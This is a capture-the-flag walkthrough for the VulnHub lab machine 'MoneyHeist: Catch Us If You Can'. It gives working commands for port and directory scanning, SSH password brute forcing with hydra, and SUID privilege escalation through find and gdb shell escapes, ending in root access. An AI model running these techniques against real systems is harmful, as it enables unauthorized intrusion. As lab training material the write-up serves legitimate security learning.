VulnHub: MoneyHeist: Catch Us If You Can
Today we will take a look at Vulnhub: Catch Us İf You Can. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
![](https://miro.medium.com/v2/resize:fit:700/1*rNM9t9NJc4AhsImZlKYG7g.jpeg)
- Network scan
Command: sudo nmap -p- -sV -sC -oN nmap/open 192.168.0.110 — open
![](https://miro.medium.com/v2/resize:fit:700/1*lc3kihbSxvfiw7NVSBoRLg.png)
- Gobuster scan
Command: gobuster dir -u http://192.168.0.110/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
![](https://miro.medium.com/v2/resize:fit:700/1*dZmaEZI8WDP52UMSbm2Nag.png)
When we look at the robots extension, we see the image tokyo.jpeg. but he was injured. Let’s download and fix.
![](https://miro.medium.com/v2/resize:fit:700/1*nC0J8onzICKzgoCVJS75MA.png)
Command: wget http://192.168.0.110/robots/tokyo.jpeg
You can find true titles here
Command: hexeditor tokyo.jpeg
![](https://miro.medium.com/v2/resize:fit:535/1*2gOrk4JuUNDYTYvh0M9J7w.png)
Let’s look at the corrected image.
![](https://miro.medium.com/v2/resize:fit:700/1*dqkqGGO_f5PQ7tWkaXUTsg.png)
This is a trap.
Let’s look at the gate extension
![](https://miro.medium.com/v2/resize:fit:606/1*lhOObgdjJPNL3bh5llSe7g.png)
we see the gate.exe file. let’s download and see
![](https://miro.medium.com/v2/resize:fit:381/1*OdxM-NPNzieNAJsQjsWrHw.png)
Here’s a new extension.
![](https://miro.medium.com/v2/resize:fit:700/1*5A2T6rBVkvyWtQoOfdrsfQ.png)
When we look at the page, we see a simple page. let’s check the bride extension
Command: gobuster dir -u http://192.168.0.110/BankOfSp41n -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt
![](https://miro.medium.com/v2/resize:fit:700/1*MRfYa0GAGZyOWU5ETMi0sA.png)
When you go to login.php, it is a simple login page. Let’s check a few simple default credentials
![](https://miro.medium.com/v2/resize:fit:700/1*L4FsUawGuXPCiy5nC0UzsA.png)
Let’s look at the source code
![](https://miro.medium.com/v2/resize:fit:281/1*iXR04INLu42sxAUt5bNcPA.png)
![](https://miro.medium.com/v2/resize:fit:543/1*pascTNWc7MAv9zN0V97-Sw.png)
And here we find the username and the password, let’s enter.
![](https://miro.medium.com/v2/resize:fit:700/1*MAv8mRwwXWsSyYGyk70FPA.png)
When I looked at the page, I couldn’t find anything to use
I looked at the source code at the end and saw a username here
![](https://miro.medium.com/v2/resize:fit:700/1*9gEwRsdWSh44Xnh0x4YPBQ.png)
Let’s try to log in with ssh with this name. But first let’s find the password
- Hydra
Command: hydra -l arturo -P /usr/share/wordlists/rockyou.txt ssh://192.168.0.110:55001 -I -t 4
![](https://miro.medium.com/v2/resize:fit:700/1*c1_t1r2XLF6d-wsucO6Elg.png)
- Ssh
![](https://miro.medium.com/v2/resize:fit:700/1*fn2Nl-cPf-dtfnh-phsn7A.png)
Command: find / -type f -perm -04000 -ls 2>/dev/null
![](https://miro.medium.com/v2/resize:fit:700/1*bM8Cbcwx18xF1QxxSyP0YQ.png)
Let’s change the user. We will use it for this
Command: find . -exec /bin/sh -p \; -quit
![](https://miro.medium.com/v2/resize:fit:700/1*UUdyi5Z43JerTeh3h_pWEQ.png)
yes we are now denver.
![](https://miro.medium.com/v2/resize:fit:498/1*sul3qp1_iX0mNC1HuKyd8A.gif)
Let’s look at the secret_diary of the Denver folder and get a new extension. let’s check it
![](https://miro.medium.com/v2/resize:fit:700/1*RmKehovSHWFumWGCWbSRhQ.png)
Let’s use it to decode
![](https://miro.medium.com/v2/resize:fit:700/1*8btY4wf4Q3H44NBJdnCz6A.png)
Find the encrypted text by making different decodings
![](https://miro.medium.com/v2/resize:fit:258/1*-eXOth2HhBgysl-NUoOe7g.png)
Nairobi
Command: su nairobi
![](https://miro.medium.com/v2/resize:fit:700/1*eTlg_iDZIvb4MSmQzoEYlA.png)
![](https://miro.medium.com/v2/resize:fit:498/1*T04WDsVg3JA86Bs7anzFUw.gif)
Tokyo
Command: find / -type f -perm -04000 -ls 2>/dev/null
![](https://miro.medium.com/v2/resize:fit:700/1*ijlRtAbU8vjqkkh1HKLj2Q.png)
Command: gdb -nx -ex ‘python import os; os.execl(“/bin/sh”, “sh”, “-p”)’ -ex quit
![](https://miro.medium.com/v2/resize:fit:700/1*CSNHhMviVpUKJ4knFx5I1w.png)
![](https://miro.medium.com/v2/resize:fit:640/1*vVbNytgxFFxeFOz9MV5aXw.gif)
I looked in Tokyo’s folder and saw an text like this.
![](https://miro.medium.com/v2/resize:fit:700/1*--VzYt1MdDPMHW3qRa-6dw.png)
If we combine the capital letters of the words, we get the root password.
![](https://miro.medium.com/v2/resize:fit:700/1*8s-vDpvRzVSC5FB92eQ0qQ.png)
And now we are the root
![](https://miro.medium.com/v2/resize:fit:640/1*7Bld_RhSNerFr3CnsHUfBQ.gif)
“If you have any questions or comments, please do not hesitate to write. Have a good days”